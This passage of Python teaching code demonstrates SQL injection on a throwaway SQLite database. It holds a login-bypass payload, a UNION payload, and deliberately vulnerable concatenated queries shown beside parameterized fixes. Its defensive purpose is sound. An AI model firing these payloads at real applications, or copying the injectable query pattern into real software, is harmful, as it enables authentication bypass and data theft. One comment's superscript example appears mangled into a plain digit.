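LOGIN_PAYLOAD = "' or 1=1--"  # decoded form of id=%27+or+1%3D1--
UNION_PAYLOAD = "null and 1=2 union select sqlite_version()"  # id=null+and+1=2+union+select+version()


def make_db() -> sqlite3.Connection:
    """Constructed schema standing in for the two applications' tables.
    Plaintext passwords are for the demonstration only."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id TEXT PRIMARY KEY, pass TEXT NOT NULL);
        INSERT INTO users VALUES ('admin', 'correct horse battery staple');
        CREATE TABLE admin_titles (id INTEGER PRIMARY KEY, title TEXT NOT NULL);
        INSERT INTO admin_titles VALUES (1, 'Principal'), (2, 'Teacher');
        """
    )
    return conn


# (1) string context: a tautology plus a comment removes the password check.
def login_vulnerable(conn: sqlite3.Connection, user_id: str, password: str):
    """Return the matched user id or None; builds the SQL by concatenation."""
    sql = f"SELECT id FROM users WHERE id = '{user_id}' AND pass = '{password}'"
    # With LOGIN_PAYLOAD the statement becomes
    #   ... WHERE id = '' or 1=1--' AND pass = 'waddup'
    # and everything after -- is a comment, so any password logs in as the
    # first user in the table.
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, user_id: str, password: str):
    """Same lookup with bound parameters: the payload is compared as a literal id."""
    row = conn.execute(
        "SELECT id FROM users WHERE id = ? AND pass = ?", (user_id, password)
    ).fetchone()
    return row[0] if row else None


# (2) numeric context: nothing to escape, so a UNION appends attacker-chosen rows.
def title_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """Return the title for raw_id, interpolated unquoted into the statement."""
    sql = f"SELECT title FROM admin_titles WHERE id = {raw_id}"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def title_safe(conn: sqlite3.Connection, raw_id: str):
    """Reject anything that is not an ASCII integer, then bind it.
    str.isdigit() alone is not enough: it also accepts superscripts such as '2'."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a plain integer")
    row = conn.execute(
        "SELECT title FROM admin_titles WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login with payload ->", login_vulnerable(conn, LOGIN_PAYLOAD, "waddup"))
    print("parameterized login           ->", login_safe(conn, LOGIN_PAYLOAD, "waddup"))
    print("vulnerable title lookup       ->", title_vulnerable(conn, UNION_PAYLOAD))
    try:
        title_safe(conn, UNION_PAYLOAD)
    except ValueError as exc:
        print("validated title lookup        ->", exc)
```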